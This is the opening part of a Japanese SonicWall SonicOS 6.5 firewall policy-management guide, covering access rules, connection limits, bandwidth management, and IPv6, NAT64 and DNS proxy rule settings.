sonicwall™ sonicos 6.5 ポリシー...sonicwall sonicos 6.5 ポリシー管理 アクセス...

260
SonicWall™ SonicOS 6.5 ポリシー 管理

Upload: others

Post on 12-Mar-2020

2 views

Category:

Documents


0 download

TRANSCRIPT

SonicWall™ SonicOS 6.5 ポリシー

管理

1目次

第 1 部 ポリシー | ルール

アクセス ルールの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6

ルール > アクセス ルール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6アクセス ルールについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7アクセス ルールの表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12ルールの優先順位の変更 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15アクセス ルールの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16アクセス ルールの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26個別アクセス ルールの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27個別アクセス ルールの有効化と無効化 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27アクセス ルールの既定の設定の復元 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27アクセス ルールのト ラフ ィ ッ ク統計の表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28アクセス ルールの設定例 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28

アプリケーシ ョ ン ルール ポリシーの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

アプリケーシ ョ ン ルールについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32アプリケーシ ョ ン ルールとは? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32アプリケーシ ョ ン ルールのメ リ ッ ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34アプリケーシ ョ ン制御の仕組み . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35アプリケーシ ョ ン ルール ポリシーの作成について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36アプリケーシ ョ ン ルールとアプリケーシ ョ ン制御 のライセンス . . . . . . . . . . . . . . . . . . . . 39用語 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

ルール > アプリケーシ ョ ン ルール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42アプリケーシ ョ ンルールポリシーの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42アプリケーシ ョ ン ルール ウィザードを使用する . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45

アプリケーシ ョ ン ルール設定の確認 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45便利なツール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46

アプリケーシ ョ ン ルールの使用例 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51一致オブジェク トでの正規表現の作成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52ポリシーベースのアプリケーシ ョ ン ルール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53アプリケーシ ョ ン シグネチャ ベース ポリシーのログ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54コンプライアンスの施行 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55サーバの保護 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55ホスト される電子メール環境 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55電子メール制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56ウェブ ブラウザ制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57HTTP POST 制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58禁止するファイル タイプ制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60ActiveX コン ト ロール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62FTP 制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64

SonicWall SonicOS 6.5 ポリシー管理

目次2

帯域幅管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70DPI を迂回する . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70個別のシグネチャ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72リバース シェル悪用の防御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75

アプリケーシ ョ ン制御の設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80

「ルール アプリケーシ ョ ン 制御」 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80アプリケーシ ョ ン制御ポリシーの作成について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82アプリケーシ ョ ン制御の状況の表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83アプリケーシ ョ ン制御のグローバル設定について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83シグネチャの表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84アプリケーシ ョ ン制御のグローバル設定の構成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90アプリケーシ ョ ン制御の種別ごとの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 アプリケーシ ョ ン制御のアプリケーシ ョ ンごとの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97シグネチャによるアプリケーシ ョ ン制御の設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99

NAT ポリシーの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102

ルール > NAT ポリシー . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102SonicOS での NAT について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103NAT 負荷分散について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104NAT64 について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106NAT ポリシー エン ト リの表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107「 NAT または NAT64 の追加または編集」 ポリシー . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108

NAT ポリシーの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113NAT ポリシーの作成例 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114

第 2 部 ポリシー | オブジェク ト

一致オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150

オブジェク ト > 一致 オブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150一致オブジェク トについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150アプリケーシ ョ ン リス ト オブジェク トについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161一致オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164アプリケーシ ョ ンリス トオブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165

動作オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168

オブジェク ト > 動作オブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168動作オブジェク トについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169帯域幅管理を用いた動作について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173動作オブジェク トの作成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178動作オブジェク トの変更 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179パケッ ト監視を使用したアクシ ョ ンの関連タスク . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179

アドレス オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182

オブジェク ト > アドレスオブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182アドレス オブジェク トの種別 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183

SonicWall SonicOS 6.5 ポリシー管理

目次3

アドレス グループについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184「オブジェク トについて > アドレス オブジェク ト」 ページ . . . . . . . . . . . . . . . . . . . . . . . . 184

既定のアドレス オブジェク トおよびアドレス グループ . . . . . . . . . . . . . . . . . . . . . . . . . . . 188既定の Pref64 アドレス オブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189アドレス オブジェク トの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189アドレス オブジェク トの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191ユーザ定義アドレス オブジェク トの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191 MAC または FQDN アドレス オブジェク トの消去 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192アドレス グループの作成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192動的アドレス オブジェク トの使用 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194

サービス オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207

オブジェク ト > サービス オブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207既定のサービス オブジェク トおよびグループ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208定義済み IP ユーザ定義サービス オブジェク ト用の プロ ト コル . . . . . . . . . . . . . . . . . . . . . 209定義済みプロ ト コルを使用したサービス オブジェク トの追加 . . . . . . . . . . . . . . . . . . . . . . 211カスタム IP 種別サービスの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212ユーザ定義サービス オブジェク トの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216ユーザ定義サービス オブジェク トの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217ユーザ定義サービス グループの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217ユーザ定義サービス グループの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218ユーザ定義サービス グループの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218

帯域幅オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219

オブジェク ト > 帯域幅 オブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219帯域幅管理について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219帯域幅オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220

電子メール アドレス オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222

オブジェク ト > 電子メール アドレス オブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222電子メール アドレス オブジェク トについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222電子メール アドレス オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224

コンテンツ フ ィルタ オブジェク トの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226

オブジェク ト > コンテンツ フ ィルタオブジェク ト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226コンテンツ フ ィルタ オブジェク トについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227URI リス トオブジェク トの管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232CFS 動作オブジェク トの管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240CFS プロファイルオブジェク トの管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251コンテンツ フ ィルタ オブジェク トの適用 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257

第 3 部 サポート

SonicWall サポート . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259

このドキュ メン トについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260

SonicWall SonicOS 6.5 ポリシー管理

目次4

SonicWall SonicOS 6.5 ポリシー管理

ポリシー | ルール

第 1 部

5

ポリシー | ルール

• アクセス ルールの設定

• アプリケーシ ョ ン ルール ポリシーの設定

• アプリケーシ ョ ン制御の設定

• NAT ポリシーの設定

1

アクセス ルールの設定

• ルール > アクセス ルール (6 ページ)

• アクセス ルールについて (7 ページ)

• アクセス ルールの表示 (12 ページ)

• ゾーン間アクセス ルールの 大数の指定 (14 ページ)

• ルールの優先順位の変更 (15 ページ)

• アクセス ルールの追加 (16 ページ)

• アクセス ルールの編集 (26 ページ)

• 個別アクセス ルールの削除 (27 ページ)

• 個別アクセス ルールの有効化と無効化 (27 ページ)

• アクセス ルールの既定の設定の復元 (27 ページ)

• アクセス ルールのト ラフ ィ ッ ク統計の表示 (28 ページ)

• アクセス ルールの設定例 (28 ページ)

ルール > アクセス ルールSonicOS の 「ルール > アクセス ルール」 ページには、 並べ替え可能なアクセス ルール管理インター

フ ェースが用意されています。 アクセス ルールは、 着信および発信アクセス ポリシーの定義、 ユー

ザ認証の設定、 および SonicWall セキュ リテ ィ装置のリモー ト管理を可能にするネッ ト ワーク管理

ツールです。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定6

「ルール > アクセス ルール」 ページ

ト ピック :

• アクセス ルールについて (7 ページ)

• アクセス ルールの表示 (12 ページ)

• ゾーン間アクセス ルールの 大数の指定 (14 ページ)

• ルールの優先順位の変更 (15 ページ)

• アクセス ルールの追加 (16 ページ)

• アクセス ルールの編集 (26 ページ)

• 個別アクセス ルールの削除 (27 ページ)

• 個別アクセス ルールの有効化と無効化 (27 ページ)

• アクセス ルールの既定の設定の復元 (27 ページ)

• アクセス ルールのト ラフ ィ ッ ク統計の表示 (28 ページ)

• アクセス ルールの設定例 (28 ページ)

アクセス ルールについて このセクシ ョ ンでは、 SonicOS アクセス ルールのさまざまな側面、 およびそれらが SonicOS の関連機

能でどのように機能するかについて説明します。

ト ピック :

• ステート フル パケッ ト検査の既定のアクセス ルールについて (8 ページ)

• 接続の制限について (8 ページ)

• アクセス ルールによる帯域幅管理の使用 (9 ページ)

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定7

• IPv6 のアクセス ルールの設定について (11 ページ)

• NAT64 のアクセス ルールの設定について (11 ページ)

• DNS プロキシのアクセス ルールについて (11 ページ)

ステート フル パケッ ト検査の既定のアクセス ルールについて 既定では、 SonicWall ネッ トワーク セキュリテ ィ装置のステート フル パケッ ト検査によって、 LAN からインターネッ トへの通信はすべて許可され、 インターネッ トから LAN へのト ラフ ィ ッ クはすべて遮

断されます。 SonicWall ネッ トワーク セキュリテ ィ装置で有効になっているステート フル パケッ ト検

査の既定のアクセス ルールでは、 以下の動作が定義されています。

• LAN、 WLAN から WAN または DMZ へのすべてのセッシ ョ ンを許可します (送信先 WAN IP アドレ

スがファイアウォール自体の WAN インターフェースの場合を除く )。

• DMZ から WAN へのすべてのセッシ ョ ンを許可します。

• WAN から DMZ へのすべてのセッシ ョ ンを禁止します。

• WAN および DMZ から LAN または WLAN へのすべてのセッシ ョ ンを禁止します。

既定のアクセス ルールを拡張または指定変更する、 追加のネッ トワーク アクセス ルールを定義する

こともできます。 例えば、 アクセス ルールを作成するこ とによって、 LAN ゾーンからWAN プライマ

リ IP アドレスへのアクセスを許可したり、 特定の種類のト ラフ ィ ッ ク (LAN から WAN への IRC など) を遮断したり、 特定の種類のト ラフ ィ ッ ク (インターネッ ト上の特定のホス トから LAN 上の特定のホス

トへの Lotus Notes データベースの同期など) を許可したり、 特定のプロ ト コル (Telnet など) の使用を

LAN 上の許可されたユーザのみに制限したりすることができます。

個別アクセス ルールは、 ネッ トワーク ト ラフ ィ ッ クの送信元 IP アドレス、 送信先 IP アドレス、 IP プロ ト コル種別を評価し、 その情報を SonicWall セキュリテ ィ装置上に作成されているアクセス ルール

と比較します。 ネッ トワーク アクセス ルールは優先権を持ち、 SonicWall セキュリテ ィ装置のステー

ト フル パケッ ト検査よりも優先させることができます。 例えば、 IRC ト ラフ ィ ッ クを遮断するアクセ

ス ルールは、 このト ラフ ィ ッ ク種別を許可している、 SonicWall セキュ リテ ィ装置の既定の設定より

も優先されます。

接続の制限について接続の制限機能は、 SonicOS の SYN Cookies および侵入防御サービス (IPS) などの機能と組み合わせたと

きに、 追加のセキュリテ ィ と制御の層を提供することを目的としています。 接続の制限では、 アクセス ルールを分類基準と して使用し、 そのクラスのト ラ フ ィ ッ クに割り当て可能な合計接続キャ ッ

シュに対する 大パーセンテージを宣言して、 ファイアウォールを介した接続を抑制する方法を提供します。

IPS と組み合わせて使用することによって、 Sasser、 Blaster、 Nimda などの特定のクラスのマルウェア

の拡散を緩和することができます。 これらのワームは、 異常に速い速度でランダムなアドレスへの接続を開始するこ とによって拡散します。 例えば、 Nimda に感染した各ホス ト では 1 秒間に 300~400回の接続が試行され、 Blaster の場合は 1 秒間に 850 個のパケッ トが送信され、 Sasser の場合は 1 秒間

に 5,120 回の試行が可能です。 通常、 悪意のないネッ トワーク ト ラフ ィ ッ ク、 特に保護ゾーンから非

保護ゾーン (LAN から WAN) へのト ラフ ィ ッ クではこれほど高い数値は見られません。 この種の悪意

注意 : ネッ トワーク アクセス ルールを定義する機能は、 非常に強力なツールです。 個別アクセ

ス ルールを使用して、 ファイアウォールの保護を無効にしたり、 インターネッ トへのアクセス

をすべて遮断したりすることができます。 ネッ トワーク アクセス ルールを作成または削除する

ときには注意が必要です。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定8

のある活動によって、 特に小規模な装置では、 数秒間のうちに利用可能な接続キャ ッシュ リ ソース

がすべて消費されます。

接続の制限を使用すると、 ワームやウイルスの拡散防止に加えて、 他の種類の接続キャ ッシュ リソースの消費に関する問題も緩和できます。 例えば、 セキュ リテ ィに問題のない内部ホス トでピア

ツー ピア ソフ トウェアが実行されているとき (IPS でこのようなサービスを許可するように設定して

いる場合) や、 内部または外部ホストでパケッ ト ジェネレータやスキャン ツールが使用されている場

合などに発生する問題を緩和できます。

さ らに、 接続の制限を使用して、 サーバに対して許可される正当な着信接続数を制限するこ とにより、 公開されているサーバ (ウェブ サーバなど) を保護することができます (つまり、 スラ ッシュ ド ッ

ト効果からサーバを保護できます)。 これは、 完全に開いていない TCP 接続またはなりすましによる

TCP 接続を検出して防止する、 SYNフラ ッ ドに対する保護とは異なります。 このよ うな接続の制限は

非保護ゾーンのト ラフ ィ ッ クに も多く適用されますが、 必要に応じて任意のゾーンのト ラフ ィ ッ クに適用できます。

接続の制限を適用するには、 特定の種類のト ラフ ィ ックに割り当て可能な接続数の割合を、 大許容接続数に対するパーセンテージで定義します。 既定の LAN->WAN 設定では、 使用可能なすべてのリソース

が LAN-> WAN (すべての送信元、 宛先、 すべてのサービス)ト ラフ ィ ックに割り当てられます。

よ り限定的なルールを構築して、 特定の種類のト ラフ ィ ッ ク (WAN 上の任意の送信先への FTP ト ラ

フ ィ ッ クなど) で消費できる接続のパーセンテージを制限したり、 あるクラスのト ラフ ィ ッ クに 100%を割り当てて、 一般的な ト ラフ ィ ッ クは低いパーセンテージ ( 小許容値は 1%) に制限して重要な ト

ラフ ィ ッ ク (重要なサーバへの HTTPS ト ラフ ィ ッ クなど) を優先したりすることができます。

アクセス ルールによる帯域幅管理の使用 帯域幅管理 (BWM) によって、 保証帯域幅と 大帯域幅をサービスに割り当てて ト ラフ ィ ッ クの優先

順位を設定できます。 アクセス ルールを使用すると、 帯域幅管理を特定のネッ トワーク ト ラフ ィ ッ

クに適用できます。 帯域幅管理が有効になっているポリシーに属しているパケッ トは、 送信される前に、 対応する優先順位キューに入れられます。

帯域幅管理は、 「ネッ トワーク > インターフェース」 ページでそれぞれのインターフェースに対して

個別に設定する必要があります。

インターフェースに帯域幅管理を設定するオプシ ョ ンは、 帯域幅管理種別として 「フ ァイアウォール設定 > 帯域幅管理」 ページで 「詳細」 と 「 グローバル」 のどちらが選択されているかによって異な

ります。

インターフェイスで帯域幅管理を有効にして設定するには:

1 「ネッ トワーク > インターフェース」 ページに移動します。

2 インターフェースの編集アイコンを選択します。 「インターフ ェースの編集」 ダイアログが表示されます。

3 「詳細」 ボタンを選択します。

4 「帯域幅管理」 セクシ ョ ンが表示されるまで画面をスクロールします。

メモ : IPS のシグネチャを接続の制限の分類基準として使用することはできません。 使用できる

のは、 アクセス ルール (例えば、 アドレス オブジェク ト とサービス オブジェク ト ) のみです。

メ モ : これは、 「フ ァ イアウォール設定 > 帯域幅管理」 ページの 「帯域幅管理種別」 が 「な

し」 以外に設定されている場合に適用されます。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定9

5 帯域幅管理種別が 「詳細」 の場合、 「インターフ ェース送信帯域幅制限を有効にする」 および「インターフ ェース受信帯域幅制限を有効にする」 チェ ッ クボッ クスのどちらかまたは両方をオンにします。

a 大インターフ ェース出力帯域幅 (Kbps) および 大インターフ ェース入力帯域幅 (Kbps)フ ィールドに、 大出力および入力帯域幅を入力します。

6 帯域幅管理種別が 「グローバル」 の場合、 「インターフ ェース送信帯域幅制限を有効にする」および 「インターフ ェース受信帯域幅制限を有効にする」 チェ ッ クボッ クスのどちらかまたは両方をオンにします。

a 利用可能な送信/受信帯域幅を、 「 大インターフェース送信帯域幅 (kbps)」 フ ィールド と

「 大インターフェース受信帯域幅 (kbps)」 フ ィールドにそれぞれ入力します。

7 「OK」 を選択します。

アクセス ルールで帯域幅管理を有効にして設定する方法については、 以下を参照して ください。

• 詳細帯域幅管理での帯域幅管理の設定 (22 ページ)

• グローバル帯域幅管理での帯域幅管理の設定 (24 ページ)

帯域幅管理の詳細については、 を参照して ください。

• 『SonicOS システム セッ トアップ』 ドキュ メン トの 「帯域幅管理の有効化」

• 『SonicOS セキュリテ ィ構成』 ドキュ メン トの 「帯域幅管理の構成」

グローバル帯域幅管理のシナリオ送信メール ト ラフ ィ ッ ク (SMTP など) のアクセス ルールを作成する場合は、 以下のパラメータで帯域

幅管理を有効にします。

• 保証帯域幅は 20 パーセン ト

• 大帯域幅は 40 パーセン ト

• 優先順位は 0 (ゼロ)

この送信 SMTP ト ラフ ィ ッ クでは、 利用可能な帯域幅の 20% が保証され、 大で利用可能な帯域幅の

40% を使用できます。 SMTP ト ラフ ィ ッ クのアクセス ルールが帯域幅管理が有効な唯一のルールであ

る場合:

• SMTP ト ラフ ィ ックで設定された 大の帯域幅 (上記の 大値である 40%) を使用している場合、

残り 60% の帯域幅をその他すべてのト ラフ ィ ッ クで使用することになります。

• SMTP ト ラフ ィ ックで設定された 大の帯域幅を使い切っていない場合は、 リンク帯域幅の 60% ~100% をその他すべてのト ラフ ィ ッ クで使用することになります。

今度は、 次に示す、 帯域幅管理が有効な FTP のルールについて考えます。

• 60% の保証帯域幅

• 70% の 大帯域幅

• 優先順位 1

このルールを先ほどの SMTP ルールと一緒に設定した場合、 ト ラフ ィ ッ クの動作は次のよ うになり

ます。

• 常に合計帯域幅の 60% が FTP ト ラフ ィ ッ ク用に確保されます (ルールの保証により )。 常に合計

帯域幅の 20% が SMTP ト ラフ ィ ッ ク用に確保されます (ルールの保証により )。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定10

• SMTP が合計帯域幅の 40% を、 FTP が合計帯域幅の 60% を使用している場合、 100% の帯域幅が

より優先順位の高いト ラフ ィ ッ クによって使用されているので、 それ以外のト ラフ ィ ッ クを送信できません。 SMTP と FTP で使用している帯域幅が 大値に達していない場合は、 利用可能

な帯域幅のうちの残っている割合をその他のト ラフ ィ ッ クで使用できます。

• SMTP ト ラフ ィ ッ ク量に応じて以下のようになります。

• SMTP ト ラフ ィ ックが減少して合計帯域幅の 10% しか使用していない場合、 FTP は 大 70%の帯域幅を、 その他すべてのト ラフ ィ ッ クは残り 20% の帯域幅を使用できます。

• SMTP ト ラフ ィ ッ クが停止した場合、 FTP は 70% の帯域幅を取得し、 残り 30% はその他

すべてのト ラフ ィ ッ クによって取得されます。

• FTP ト ラフ ィ ッ クが停止した場合、 SMTP は 40% の帯域幅を取得し、 残り 60% はその他すべて

のト ラフ ィ ッ クによって取得されます。

IPv6 のアクセス ルールの設定について

IPv6 アクセス ルールは、 IPv4 アドレス オブジェク トの代わりに IPv6 アドレス オブジェク ト を選択す

ることで、 IPv4 アクセスと同様の方法で設定できます。 「ルール > アクセスルール」 ページで、 「IPバージ ョ ンの表示」 設定を行う には、 3 つのオプシ ョ ンがあ り ます( 「IPv4」 、 「IPv6」 、 または

「IPv4 と IPv6」 )。

IPv6 アクセス ルールを追加する際、 送信元および送信先には IPv6 アドレス オブジェク トのみ使用で

きます。

SonicOS IPv6 実装の詳細については、 『SonicOS システムセッ トアップ』 ドキュ メン トの 「IPv6 」 セク

シ ョ ンを参照して ください。

NAT64 のアクセス ルールの設定について

NAT64 のアクセス ルールは、 IPv4 または IPv6 と同様の方法で設定できます。 NAT64 の詳細について

は、 NAT64 について (106 ページ) および NAT64 ポリシーのための WAN から WAN へのアクセス ルール

の作成 (146 ページ) を参照して ください。 IPv6 の詳細については、 『SonicOS システム セッ トアップ』

ドキュ メン トの 「IPv6」 セクシ ョ ンを参照して ください。

DNS プロキシのアクセス ルールについて

「ネ ッ ト ワーク」 > 「DNSプロキシ」 ページで DNS プロキシが有効になっている場合、 イン ター

フェースで DNS プロキシを有効にすると、 以下の設定で 1 つの許可ルールが自動的に追加されます。

• 「送信元インターフェース」 と 「送信先インターフェース」 が同じです。

• 「送信元」 は 「すべて」 です。

• 「送信先」 はインターフェース IP です。

• 「サービス」 は 「DNS (名前サービス) TCP」 または 「DNS (名前サービス) UDP」 です。

• 他の自動的に追加された管理ルールと同じ属性を持っています:

• これを無効にすることはできません。

